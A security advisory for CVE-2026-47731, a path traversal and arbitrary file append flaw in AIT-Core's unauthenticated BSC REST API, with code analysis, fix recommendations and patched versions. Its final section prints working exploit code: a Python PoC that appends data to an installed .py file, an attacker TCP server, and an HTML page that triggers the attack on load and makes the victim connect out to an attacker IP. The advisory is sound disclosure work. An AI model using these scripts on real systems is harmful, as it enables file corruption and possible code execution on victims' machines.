PT-2026-47089 · Pypi · Ait-Core

Published

2026-06-05

·

Updated

2026-06-05

·

CVE-2026-47731

CVSS v3.1

9.1

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

1. Summary

The Binary Stream Capture (BSC) component exposes an unauthenticated HTTP API for dynamically creating packet capture “handlers.” Because the code blindly trusts path‑related form fields, a remote client can:
  • Bypass the configured log root and direct BSC to log to arbitrary filesystem paths (path traversal / directory escape), and
  • Append attacker‑controlled data to those files, using the privileges of theait-bsc process.
There are two ways for a remote attacker to trigger this:
  1. If the attacker has access to the network where ait-bsc is deployed (a reason for that could be that the ports are publicly accessible), the payloads can be directly sent to the server to trigger the arbitrary file append. This type of attack is demonstrated in python poc.py.
  2. Even if the attacker does not have direct access to the network because the software is running in a local network, it is possible to exploit this if a bad actor in that network opens an attacker-controlled website (which might be a website created by an attacker, or a third-party website compromised by the attacker). The browser javascript can automatically send the requests necessary to exploit this into the local network. This is even possible if the server is only accessible on localhost. This type of attack is demonstrated by attacker tcp.py and test1.html (first launch the attacker TCP server, then start a webserver to host test1.html, for example using python3 -m http.server 7000, and open test1.html).

Impact

This issue affects BSC (Binary Stream Capture) and usage of the ait-bsc server. This impacts AIT-Core versions before 3.1.1, from 2.x before 2.6.1. Users are recommended to upgrade to version 3.1.1 or 2.6.1.

Details

A remote attacker can use this vulnerability to append data to arbitrary files on the system (if the ait-bsc has privileges to write to them). It is easy to use this to corrupt data on the system (which can include the AIT-Core python code to crash the server after it is restarted and python attempts to execute the corrupted code). It should be mentioned here that there seems to be a bug in the TCP handler that results in a lot of data being written in an infinite loop after the connection has been closed, this could result in excessive disk space use. That the attacker can modify executable files like python or bash scripts means that this vulnerability could also lead to Remote Code Execution as soon as the user runs the modified code. However, depending on the system, it is not so easy to execute this attack in practice (it might not be possible), because ait-bsc adds a header in front of attacker-controlled data.

Fix Information

The vulnerability is mitigated by constraining BSC ability to write paths only in the project root log directory which is configured through the bsc.yaml. Additionally, any attempts to traverse outside of the configured location are rejected.

Patches

  • 3.1.1
  • 2.6.1

2. Affected Code Paths

2.1 REST entry point: /NAME/start

StreamCaptureManagerServer exposes an unauthenticated POST endpoint:
# ait/core/bsc.py

class StreamCaptureManagerServer(Bottle):
  def route(self):
    self. app.route("/", method="GET", callback=self. get logger list)
    self. app.route("/stats", method="GET", callback=self. fetch handler stats)
    self. app.route(
      "/<name>/start", method="POST", callback=self. add logger by name
    )
    self. app.route(
      "/<name>/stop", method="DELETE", callback=self. stop logger by name
    )
    ...
Handler:
def add logger by name(self, name):
  ...
  data = dict(request.forms)
  loc = data.pop("loc", "")
  port = data.pop("port", None)
  conn type = data.pop("conn type", None)

  if not port or not conn type:
    raise ValueError("Port and/or conn type not set")

  address = [loc, int(port)]

  if "rotate log" in data:
    data["rotate log"] = True if data == "true" else False

  if "rotate log delta" in data:
    data["rotate log delta"] = int(data["rotate log delta"])

  self. logger manager.add logger(name, address, conn type, **data)
All form fields except loc, port, conn type are passed directly as **data into add logger. This includes attacker‑controlled path, file name pattern, and potentially log dir path. There is no authentication on this route.

2.2 Manager: unvalidated path and log dir path

StreamCaptureManager.add logger:
# ait/core/bsc.py

def add logger(self, name, address, conn type, log dir path=None, **kwargs):
  capture handler conf = kwargs

  if not log dir path:
    log dir path = self. mngr conf["root log directory"]

  log dir path = os.path.normpath(os.path.expanduser(log dir path))

  capture handler conf["log dir"] = log dir path
  capture handler conf["name"] = name
  if "rotate log" not in capture handler conf:
    capture handler conf["rotate log"] = True

  ...
  address key = str(address)
  if address key in self. stream capturers:
    capturer = self. stream capturers[address key][0]
    capturer.add handler(capture handler conf)
    return

  socket logger = SocketStreamCapturer(capture handler conf, address, conn type)
  greenlet = gevent.spawn(socket logger.socket monitor loop)
  self. stream capturers[address key] = (socket logger, greenlet)
  self. pool.add(greenlet)
Key points:
  • If the REST client supplies log dir path explicitly (as a named parameter), it overrides the manager’s root log directory.
  • All other attacker‑supplied fields in kwargs become part of the handler configuration dict (capture handler conf), including path and file name pattern.
  • There is no check that log dir path or path are relative or confined.

2.3 Path traversal via get log file

SocketStreamCapturer. get log file builds the actual log path:
# ait/core/bsc.py

def get log file(self, handler):
  """Generate log file path for a given handler"""
  if "file name pattern" not in handler:
    filename = "%Y-%m-%d-%H-%M-%S-{name}.pcap"
  else:
    filename = handler["file name pattern"]

  log file = handler["log dir"]
  if "path" in handler:
    log file = os.path.join(log file, handler["path"], filename)
  else:
    log file = os.path.join(log file, filename)

  log file = time.strftime(log file, time.gmtime())
  log file = log file.format(**handler)

  return log file
On POSIX systems:
  • If handler["path"] is absolute (e.g. /home/user/...), os.path.join(base, abs component, ...) discards the base component:
os.path.join("/configured/root", "/home/elias/ait-venv/...", "dmc.py")
# -> "/home/elias/ait-venv/.../dmc.py"
  • If handler["path"] contains .., the result can point outside the nominal root even if path is relative.
There is:
  • No os.path.realpath canonicalization after join, and
  • No enforcement that the final log file begins with the configured root prefix.
Combined with StreamCaptureManager.add logger, this means:
  • Attacker controls both:
  • handler["log dir"] (via log dir path), and
  • handler["path"] and handler["file name pattern"].
They can therefore direct BSC’s log output to any path that the OS permissions allow, not just under root log directory.

2.4 File opened for append without safety checks

# ait/core/bsc.py

def get logger(self, handler):
  """Initialize a PCAP stream for logging data"""
  log file = self. get log file(handler)

  if not os.path.isdir(os.path.dirname(log file)):
    os.makedirs(os.path.dirname(log file))

  handler["log rot time"] = time.gmtime()
  return pcap.open(log file, mode="a")
pcap.open:
# ait/core/pcap.py

def open(filename, mode="r", **options):
  ...
  mode = mode.replace("b", "") + "b" # "a" -> "ab"
  ...
  stream = PCapStream(builtins.open(filename, mode), mode)
  return stream
Consequences:
  • If the target directory does not exist, os.makedirs(os.path.dirname(log file)) will create it, even if it is outside the intended root.
  • The file is opened in append‑binary mode ("ab"):
  • The OS will create it if missing.
  • Existing content is preserved; new data is appended.
  • There is no:
  • realpath‑based confinement,
  • symlink protection,
  • or additional access control beyond standard filesystem permissions.

2.5 A part of the data written is attacker‑controlled network payload

Captured data path:
# ait/core/bsc.py

def capture packet(self):
  """Write packet data to the logger's log file."""
  data = self.socket.recv(self. buffer size)

  for h in self.capture handlers:
    h["reads"] += 1
    h["data read"] += len(data)

    d = data
    if "pre write transforms" in h:
      for data transform in h["pre write transforms"]:
        d = data transform(d)
    h["logger"].write(d)
SocketStreamCapturer. init :
  • UDP:
if conn type == "udp":
  self.socket = gevent.socket.socket(AF INET, SOCK DGRAM)
  self.socket.bind((address[0], address[1]))
  • TCP:
elif conn type == "tcp":
  self.socket = gevent.socket.socket(AF INET, SOCK STREAM)
  self.socket.connect((address[0], address[1]))
Thus:
  • For UDP, any host that can send datagrams to the configured (IP,port) directly controls data.
  • For TCP, the remote server at (loc, port) directly controls data.
PCapStream.write wraps this data in a PCAP packet header and writes it to the file, but does not sanitize or transform the payload bytes beyond optional in‑process transforms.

3. Recommendations

The core objective is to ensure that untrusted REST input cannot steer log file paths outside a trusted directory tree.

3.1 Constrain log paths to a trusted root

  • In StreamCaptureManager.add logger and/or SocketStreamCapturer. get log file:
  1. Compute a canonical root:
root = os.path.realpath(self. mngr conf["root log directory"])
  1. When applying path and file name pattern, always join relative to this root; do not accept absolute path from REST:
user path = handler.get("path", "")
# force relative
user path = user path.lstrip(os.sep)
candidate = os.path.realpath(os.path.join(root, user path, filename))
  1. Enforce the prefix:
if not (candidate == root or candidate.startswith(root + os.sep)):
  raise ValueError("Invalid log path; must remain under root log directory")
  • Reject any REST‑supplied log dir path that is absolute or attempts to escape the configured root, or disallow log dir path entirely in REST calls.

3.2 Treat REST input as untrusted

  • Only allow path / file name pattern override from the configuration file (bsc.yaml), not from REST.
  • For REST‑created handlers, either:
  • Use a fixed subdirectory under the configured root, or
  • Validate path strictly as a simple relative name with no / or ...

3.3 Note on /tmp usage

  • While not the root cause of this vulnerability, using a world‑writable directory such as /tmp as a log root in a multi‑user system is generally unsafe (standard symlink and race issues).
  • It is recommended to:
  • Use a dedicated, non‑world‑writable directory for BSC logs (e.g. /var/opt/ait-bsc/logs).
  • Update the documentation examples to reflect this and add a warning against /tmp for production use.

3.4 Harden open calls

  • If symlink attacks are a concern in specific deployments, consider to not follow them when writing to log files.

3.5 REST API exposure

  • Because /NAME/start directly controls file paths and network connections:
  • It should not be exposed to untrusted networks.
  • Consider adding optional HTTP authentication or limiting binding to a protected interface or Unix domain socket.

4 Proof of concept files

4.1 python poc.py

#!/usr/bin/env python3
"""
AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header).

Assumptions:
- ait-core and requests are installed.
- ait-bsc is running on 127.0.0.1:8080 with a bsc.yaml including:

  capture manager:
   root log directory: /tmp
   manager server:
    host: localhost
    port: 8080
  handlers: []

What this script does:
1) Uses the BSC REST API to create a conn type=udp handler that:
   - binds a UDP socket on UDP PORT, and
   - logs to TARGET PATH, which is OUTSIDE /tmp via 'path'.
2) Waits until the current UNIX time satisfies (ts sec & 0xFF) == 0
  (low byte of ts sec == 0) and sends a UDP PAYLOAD right then.
  On little-endian, this makes the FIRST BYTE of the PCAP packet header
  (ts sec low byte) 0x00 with high probability.
3) Shows that TARGET PATH (outside /tmp) exists and contains the payload.
4) DELETEs the handler so you can rerun the script without restarting ait-bsc.

Note:
- The script does NOT delete or truncate TARGET PATH.
- If TARGET PATH already exists, ait-bsc will append a new PCAP packet
 (header + payload) at the end of the file.
"""

import os
import socket
import time

import requests

# BSC REST API base URL
BSC BASE URL = "http://127.0.0.1:8080"

# UDP capture parameters
UDP PORT = 9999
HANDLER NAME = "traversal-udp-poc-timed"
CONN TYPE = "udp"

# Target directory and file OUTSIDE /tmp
HOME = os.path.expanduser("~")
TARGET DIR = "/home/elias/ait-venv/lib/python3.10/site-packages/ait/core/"
TARGET FILE = "dmc.py"
TARGET PATH = os.path.join(TARGET DIR, TARGET FILE)

# Payload to be sent in the UDP datagram
PAYLOAD = b"ATTACK PAYLOAD UDP TIMED 12345"


def wait for first header byte zero():
  """
  Wait until the low byte of the current UNIX seconds is 0.

  PCapPacketHeader.pack() writes ts sec first, and on little-endian systems
  the first byte in the file is ts sec & 0xFF. We wait for ts sec % 256 == 0
  and for the fractional part of the second to be small.
  """
  print("[*] Waiting for ts sec & 0xFF == 0 (may take up to ~4m16s)...")
  while True:
    now = time.time()
    ts sec = int(now)
    # Condition: low byte zero and we are in the first 200ms of this second
    if (ts sec & 0xFF) == 0 and (now - ts sec) < 0.2:
      print(f"[+] Condition met: ts sec={ts sec}, low byte=0x00")
      return
    time.sleep(0.01)


def create udp handler():
  """
  Use BSC REST API to create a UDP handler that binds on UDP PORT and
  logs to TARGET PATH, which is outside /tmp via the 'path' parameter.
  """
  data = {
    "loc": "",         # bind on all interfaces
    "port": str(UDP PORT),
    "conn type": CONN TYPE,
    "path": TARGET DIR,     # ABSOLUTE path outside /tmp
    "file name pattern": TARGET FILE,
  }
  url = f"{BSC BASE URL}/{HANDLER NAME}/start"
  print(f"[+] Creating UDP handler via POST {url}")
  resp = requests.post(url, data=data)
  print(f"[+] Handler creation HTTP status: {resp.status code}")
  if not (200 <= resp.status code < 300):
    raise SystemExit(f"Handler creation failed: {resp.status code} {resp.text!r}")


def send udp payload timed():
  """
  Wait for the desired timestamp condition, then send the UDP payload
  to the handler's bound UDP port.
  """
  wait for first header byte zero()
  print(f"[+] Sending timed UDP payload to 127.0.0.1:{UDP PORT}")
  sock = socket.socket(socket.AF INET, socket.SOCK DGRAM)
  try:
    sock.sendto(PAYLOAD, ("127.0.0.1", UDP PORT))
  finally:
    sock.close()
  # Give ait-bsc a moment to recv and write
  time.sleep(0.5)


def stop udp handler():
  """
  Stop the handler so the script can be rerun without restarting ait-bsc.
  """
  url = f"{BSC BASE URL}/{HANDLER NAME}/stop"
  try:
    resp = requests.delete(url, timeout=2)
    print(f"[+] DELETE {url} -> HTTP {resp.status code}")
  except Exception as e:
    print(f"[!] Failed to DELETE handler: {e!r}")


def show result():
  """
  Display hex+ASCII view of the first bytes of TARGET PATH.
  """
  if not os.path.exists(TARGET PATH):
    print(f"[!] Target file does not exist: {TARGET PATH}")
    print("  ait-bsc did not create/write the file u2014 check config and that ait-bsc is running.")
    return

  print(f"[+] Target file was created or appended by ait-bsc: {TARGET PATH}")
  data = open(TARGET PATH, "rb").read()
  print(f"[+] Target file size: {len(data)} bytes")

  def chunked(seq, size):
    for i in range(0, len(seq), size):
      yield i, seq[i : i + size]

  print("[+] First bytes of file (hex + ASCII):")
  for offset, chunk in chunked(data, 16):
    hex bytes = " ".join(f"{b:02x}" for b in chunk)
    ascii bytes = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    print(f"{offset:08x} {hex bytes:<47} |{ascii bytes}|")
    if offset >= 96:
      break

  if PAYLOAD in data:
    print("[+] CONFIRMED: payload bytes are present in the file.")
  else:
    print("[!] Payload bytes not found (something went wrong).")


def main():
  print("[*] AIT-Core BSC path traversal & arbitrary file append PoC (UDP, timed header)")
  print(f"[*] BSC base URL : {BSC BASE URL}")
  print(f"[*] UDP port   : {UDP PORT}")
  print(f"[*] TARGET DIR  : {TARGET DIR}")
  print(f"[*] TARGET FILE : {TARGET FILE}")
  print(f"[*] FULL PATH  : {TARGET PATH}")
  print()

  # We deliberately do NOT create TARGET DIR or TARGET PATH here.
  # ait-bsc will create the directory and file when it opens the log path.
  create udp handler()
  send udp payload timed()
  show result()
  stop udp handler()

  print()
  print("[*] If you see your PAYLOAD bytes in TARGET PATH (which is not under /tmp),")
  print("[*] then BSC has written outside its configured root log directory via REST 'path' using UDP.")
  print("[*] The script also timed the send so the first packet header byte (ts sec low byte) is likely 0x00.")


if  name  == " main ":
  main()

4.2 attacker tcp.py

#!/usr/bin/env python3
import socket

HOST = "0.0.0.0"  # attacker host interface
PORT = 9001     # must match 'port' you send to ait-bsc
PAYLOAD = b"ATTACK PAYLOAD FROM ATTACKER 12345
"

def main():
  print(f"[*] Attacker TCP server listening on {HOST}:{PORT}")
  with socket.socket(socket.AF INET, socket.SOCK STREAM) as srv:
    srv.setsockopt(socket.SOL SOCKET, socket.SO REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen(1)

    print("[*] Waiting for connection from ait-bsc...")
    bsc sock, bsc addr = srv.accept()
    print(f"[+] Got connection from ait-bsc at {bsc addr}")

    with bsc sock:
      print("[+] Sending payload to ait-bsc...")
      bsc sock.sendall(PAYLOAD)
      print("[+] Payload sent, closing connection")

  print("[*] Done.")

if  name  == " main ":
  main()

4.3 test1.html

<!DOCTYPE html>
<html>
<head>
 <meta charset="utf-8">
 <title>AIT-BSC Path Traversal PoC (Browser + TCP)</title>
</head>
<body>
<script>
(function () {
 // AIT-BSC REST API on the victim
 const BSC URL   = "http://127.0.0.1:8080";
 const HANDLER NAME = "traversal-tcp-from-browser";

 // Attacker TCP server (remote)
 const ATTACKER HOST = "192.168.1.184"; // change to real host/IP
 const ATTACKER PORT = 9001;          // must match Python server

 // Target file on the victim (outside /tmp)
 const TARGET DIR = "/home/elias/ait-venv/lib/python3.10/site-packages/ait/core/";
 const TARGET FILE = "dmc.py";

 function startHandler() {
  // Tell ait-bsc to:
  // - connect via TCP to ATTACKER HOST:ATTACKER PORT
  // - log to TARGET DIR/TARGET FILE (escape /tmp via 'path')
  const params = new URLSearchParams();
  params.set("loc", ATTACKER HOST);
  params.set("port", String(ATTACKER PORT));
  params.set("conn type", "tcp");
  params.set("path", TARGET DIR);
  params.set("file name pattern", TARGET FILE);

  fetch(`${BSC URL}/${HANDLER NAME}/start`, {
   method: "POST",
   headers: {
    "Content-Type": "application/x-www-form-urlencoded"
   },
   body: params.toString(),
   mode: "no-cors" // we don't care about reading the response
  }).catch(() => {});
 }

 // On page load, just start the handler. The attacker TCP server
 // will send the payload as soon as ait-bsc connects.
 window.addEventListener("load", startHandler);
})();
</script>
</body>
</html>

Fix

Path traversal

Weakness Enumeration

Related Identifiers

CVE-2026-47731
GHSA-P462-PRXW-MJX4

Affected Products

Ait-Core